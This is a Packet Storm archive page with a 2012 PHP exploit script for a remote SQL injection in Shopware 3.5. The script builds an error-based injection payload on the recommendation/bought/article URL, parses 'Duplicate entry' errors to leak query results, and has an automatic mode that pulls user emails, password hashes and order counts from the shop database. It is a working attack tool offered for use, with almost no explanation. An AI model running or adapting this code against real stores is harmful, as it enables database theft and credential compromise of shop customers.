exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Shopware 3.5 SQL Injection

Shopware 3.5 SQL Injection
Posted Jul 14, 2012
Authored by Kataklysmos

Shopware version 3.5 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 5a6df1b8bd0a494ca93cc2d947cf380ac0ddc0a03aa982f3f7ca4cdd7b20e18c

Shopware 3.5 SQL Injection

Change Mirror Download
#!/usr/bin/php
<?php

# Exploit Title: Shopware 3.5 - SQL Injection
# Date: 13.07.2012
# Exploit Author: Kataklysmos
# Software Link: http://www.shopware.de/
# Version: 3.5


function http_req($host, $q)
{
if(!$fs = fsockopen($host, 80))
exit("Could not open HTTP- Connection to ".$host."\r\n\r\n");

$head = "GET /recommendation/bought/article/".urlencode("0 AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT (".$q.") FROM `information_schema`.`tables` LIMIT 0,1), FLOOR(RAND(0)*2)) x FROM `information_schema`.`tables` GROUP BY x) z)")." HTTP/1.1\r\n";
$head .= "Host: ".$host."\r\n";
$head .= "Connection: Close\r\n\r\n";

fwrite($fs, $head);

$ret = '';
while(!feof($fs))
$ret .= fgets($fs, 4096);
fclose($fs);

return $ret;
}

function mask($cont)
{
if(preg_match('/Duplicate entry \'(.*)1\' for/', $cont, $m))
return $m[1];
else
return false;
}

function space($x)
{
$r = '';
for($i = 0; $i < $x; $i++)
$r .= ' ';
return $r;
}

echo "\r\nExploit Title: Shopware 3.5 - SQL Injection\r\n";
echo "Date: 13.07.2012\r\n";
echo "Exploit Author: Kataklysmos\r\n";
echo "Software Link: http://www.shopware.de/\r\n";
echo "Version: 3.5\r\n\r\n";

if(!isset($argv[2]))
{
echo " Usage: \r\n";
echo " ".$argv[0]." HOST --auto\r\n";
echo " ".$argv[0]." www.shopwaredemo.de --auto\r\n\r\n";
echo " ".$argv[0]." HOST QUERY\r\n";
echo " ".$argv[0]." www.shopwaredemo.de \"SELECT COUNT(`id`) FROM `s_user`\"\r\n";
echo " ".$argv[0]." www.shopwaredemo.de \"SELECT `email` FROM `s_user` LIMIT 0,1\"\r\n\r\n";
exit(1);
}

if($argv[2] != '--auto')
{
$x = http_req($argv[1], $argv[2]);

if(!$x = mask($x))
exit("Your query failed!\r\n\r\n");

echo "Query:\r\n ".$argv[2]."\r\nReturn:\r\n ".$x."\r\n\r\n";
}
else
{
$task = array(array('Amount of registered users', 'SELECT COUNT(`id`) FROM `s_user`', null),
array('E- Mail from first user', 'SELECT `email` FROM `s_user` ORDER BY `id` LIMIT 0,1', null),
array('Password from first user', 'SELECT `password` FROM `s_user` LIMIT 0,1', null),
array('Amount of orders', 'SELECT COUNT(`id`) FROM `s_order`', null)
);

for($i = 0; $i < count($task); $i++)
{
echo "[ .. ] Task: \"".$task[$i][0]."\"";

$x = http_req($argv[1], $task[$i][1]);
if(!$x = mask($x))
echo "\r[fail] Task: \"".$task[$i][0]."\"\r\n";
else
{
echo "\r[ ok ] Task: \"".$task[$i][0]."\"\r\n";
$task[$i][2] = $x;
}
}
echo "\r\n";

for($i = 0; $i < count($task); $i++)
echo $task[$i][0].space(26-strlen($task[$i][0])).' : '.$task[$i][2]."\r\n";

echo "\r\n";
}

?>

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close